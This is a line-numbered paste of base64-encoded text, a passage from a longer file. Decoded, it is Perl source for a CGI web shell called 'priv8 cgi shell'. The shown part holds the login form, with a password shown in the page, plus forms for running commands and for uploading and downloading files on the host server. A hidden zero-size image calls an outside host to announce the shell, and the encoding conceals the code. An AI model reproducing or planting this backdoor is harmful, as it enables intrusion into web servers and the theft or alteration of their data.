  4425. InB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9
  4426.  
  4427. ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0KDQojLS0tLS0tLS0tLS0t
  4428.  
  4429. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4430.  
  4431. LS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJz
  4432.  
  4433. ZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlw
  4434.  
  4435. YXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZp
  4436.  
  4437. bGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRp
  4438.  
  4439. bnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAk
  4440.  
  4441. aW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3Rl
  4442.  
  4443. OiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBD
  4444.  
  4445. R0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4446.  
  4447. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7
  4448.  
  4449. DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwp
  4450.  
  4451. Ow0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0
  4452.  
  4453. aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9N
  4454.  
  4455. RVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0N
  4456.  
  4457. CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUo
  4458.  
  4459. U1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGlu
  4460.  
  4461. LCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBk
  4462.  
  4463. YXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBi
  4464.  
  4465. b3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZl
  4466.  
  4467. ciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhl
  4468.  
  4469. YWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0K
  4470.  
  4471. CQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMg
  4472.  
  4473. dGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9
  4474.  
  4475. ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9
  4476.  
  4477. ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0K
  4478.  
  4479. CQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJ
  4480.  
  4481. CSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIv
  4482.  
  4483. Ow0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxu
  4484.  
  4485. fFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4
  4486.  
  4487. KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRh
  4488.  
  4489. cmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNw
  4490.  
  4491. bGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGld
  4492.  
  4493. ID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsN
  4494.  
  4495. CgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMv
  4496.  
  4497. JSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRl
  4498.  
  4499. ZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0K
  4500.  
  4501. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4502.  
  4503. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMg
  4504.  
  4505. QXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0K
  4506.  
  4507. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4508.  
  4509. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVk
  4510.  
  4511. Q3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEt
  4512.  
  4513. ekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJcHJpbnQgIkNvbnRlbnQtdHlwZTog
  4514.  
  4515. dGV4dC9odG1sXG5cbiI7DQoJcHJpbnQgPDxFTkQ7DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPnBy
  4516.  
  4517. aXY4IGNnaSBzaGVsbDwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCg0KPG1ldGEgbmFtZT0ia2V5
  4518.  
  4519. d29yZHMiIGNvbnRlbnQ9InByaXY4IGNnaSBzaGVsbCAgXyAgICAgaTVfQGhvdG1haWwuY29tIj4N
  4520.  
  4521. CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJwcml2OCBjZ2kgc2hlbGwgIF8gICAg
  4522.  
  4523. aTVfQGhvdG1haWwuY29tIj4NCjwvaGVhZD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5m
  4524.  
  4525. b2N1cygpIiBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1h
  4526.  
  4527. cmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHRleHQ9IiNGRjAwMDAiPg0KPHRhYmxlIGJv
  4528.  
  4529. cmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8
  4530.  
  4531. dHI+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGFsaWduPSJj
  4532.  
  4533. ZW50ZXIiIHdpZHRoPSIxJSI+DQo8Yj48Zm9udCBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0K
  4534.  
  4535. PHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNp
  4536.  
  4537. emU9IjIiPjxiPiANCjxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZm
  4538.  
  4539. NjYiPnByaXY4IGNnaSBzaGVsbDwvYj4gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9u
  4540.  
  4541. dD48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjRkZGRkZGIj48
  4542.  
  4543. Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4NCg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9u
  4544.  
  4545. P2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VXBs
  4546.  
  4547. b2FkIEZpbGU8L2ZvbnQ+PC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxv
  4548.  
  4549. YWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5Eb3dubG9hZCBG
  4550.  
  4551. aWxlPC9mb250PjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij48Zm9u
  4552.  
  4553. dCBjb2xvcj0iI0ZGMDAwMCI+RGlzY29ubmVjdDwvZm9udD48L2E+IHwNCjwvZm9udD48L3RkPg0K
  4554.  
  4555. PC90cj4NCjwvdGFibGU+DQo8Zm9udCBzaXplPSIzIj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0t
  4556.  
  4557. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4558.  
  4559. LS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0t
  4560.  
  4561. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4562.  
  4563. LS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCSRNZXNzYWdlID0gcSQ8L2ZvbnQ+PGgxPnBh
  4564.  
  4565. c3M9cHJpdjg8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9y
  4566.  
  4567. ZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxu
  4568.  
  4569. ZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPg0KJDsNCiMnDQoJcHJpbnQgPDxF
  4570.  
  4571. TkQ7DQo8Y29kZT4NCg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRT
  4572.  
  4573. ZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVO
  4574.  
  4575. RA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4576.  
  4577. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0
  4578.  
  4579. IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  4580.  
  4581. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4582.  
  4583. LS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+
  4584.  
  4585. DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJy
  4586.  
  4587. Pjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4588.  
  4589. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50
  4590.  
  4591. cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4592.  
  4593. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
  4594.  
  4595. dWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1l
  4596.  
  4597. PSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBl
  4598.  
  4599. PSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+DQo8L2ZvbnQ+DQo8Zm9udCBzaXplPSIz
  4600.  
  4601. Ij4NCmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2
  4602.  
  4603. Ij5wcml2OCBjZ2kgc2hlbGw8L2I+PGJyPg0KcGFzc3dvcmQ6PC9mb250Pjxmb250IGNvbG9yPSIj
  4604.  
  4605. MDA5OTAwIiBzaXplPSIzIj48aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0
  4606.  
  4607. IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0K
  4608.  
  4609. DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4610.  
  4611. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRN
  4612.  
  4613. TCBQYWdlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4614.  
  4615. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlRm9vdGVyDQp7DQoJ
  4616.  
  4617. cHJpbnQgIjwvZm9udD48L2JvZHk+PC9odG1sPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  4618.  
  4619. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4620.  
  4621. LS0NCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNh
  4622.  
  4623. biBiZSBhY2Nlc3NlcyB1c2luZyB0aGUNCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9DQojLS0tLS0t
  4624.  
  4625. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4626.  
  4627. LS0tLS0tLS0tLS0tLS0tDQpzdWIgR2V0Q29va2llcw0Kew0KCUBodHRwY29va2llcyA9IHNwbGl0
  4628.  
  4629. KC87IC8sJEVOVnsnSFRUUF9DT09LSUUnfSk7DQoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2ll
  4630.  
  4631. cykNCgl7DQoJCSgkaWQsICR2YWwpID0gc3BsaXQoLz0vLCAkY29va2llKTsNCgkJJENvb2tpZXN7
  4632.  
  4633. JGlkfSA9ICR2YWw7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4634.  
  4635. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0
  4636.  
  4637. aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4638.  
  4639. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
  4640.  
  4641. CnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3Nl
  4642.  
  4643. ZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0t
  4644.  
  4645. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4646.  
  4647. LS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2lu
  4648.  
  4649. IGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4650.  
  4651. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXBy
  4652.  
  4653. aW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUN
  4654.  
  4655. CgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50
  4656.  
  4657. TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoN
  4658.  
  4659. CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4660.  
  4661. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9n
  4662.  
  4663. aW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBh
  4664.  
  4665. Z2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQg
  4666.  
  4667. ZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5
  4668.  
  4669. cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0t
  4670.  
  4671. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4672.  
  4673. LS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4gDQp7DQoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBh
  4674.  
  4675. c3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQNCgl7DQoJCXByaW50ICJTZXQtQ29va2llOiBTQVZF
  4676.  
  4677. RFBXRD0kTG9naW5QYXNzd29yZDtcbiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJlBy
  4678.  
  4679. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2Ug
  4680.  
  4681. IyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJ
  4682.  
  4683. JlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFz
  4684.  
  4685. c3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJ
  4686.  
  4687. CX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0t
  4688.  
  4689. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4690.  
  4691. LS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0
  4692.  
  4693. aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4694.  
  4695. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBy
  4696.  
  4697. aW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
  4698.  
  4699. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8
  4700.  
  4701. PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3Jp
  4702.  
  4703. cHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFu
  4704.  
  4705. ZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
  4706.  
  4707. JFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1p
  4708.  
  4709. dCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCg0KRU5EDQp9DQoNCiMtLS0tLS0t
  4710.  
  4711. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4712.  
  4713. LS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVz
  4714.  
  4715. ZXIgdG8gZG93bmxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4716.  
  4717. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZp
  4718.  
  4719. bGVEb3dubG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDog
  4720.  
  4721. IlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxj
  4722.  
  4723. b2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlv
  4724.  
  4725. biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
  4726.  
  4727. PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQg
  4728.  
  4729. ZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBz
  4730.  
  4731. aXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0i
  4732.  
  4733. QmVnaW4iPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  4734.  
  4735. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4736.  
  4737. LS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2Fk
  4738.  
  4739. IGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4740.  
  4741. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0K
  4742.  
  4743. ew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVy
  4744.  
  4745. TmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5h
  4746.  
  4747. bWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9u
  4748.  
  4749. PSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxp
  4750.  
  4751. bnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZu
  4752.  
  4753. YnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+DQpP
  4754.  
  4755. dmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4NClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8
  4756.  
  4757. aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIg
  4758.  
  4759. bmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9
  4760.  
  4761. ImEiIHZhbHVlPSJ1cGxvYWQiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0t
  4762.  
  4763. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4764.  
  4765. LS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91
  4766.  
  4767. dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8NCiMgdGVybWluYXRlIHRoZSBzY3Jp
  4768.  
  4769. cHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBp
  4770.  
  4771. cw0KIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuDQojLS0t
  4772.  
  4773. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  4774.  
  4775. LS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQ29tbWFuZFRpbWVvdXQNCnsNCglpZighJFdpbk5UKQ0K
  4776.  
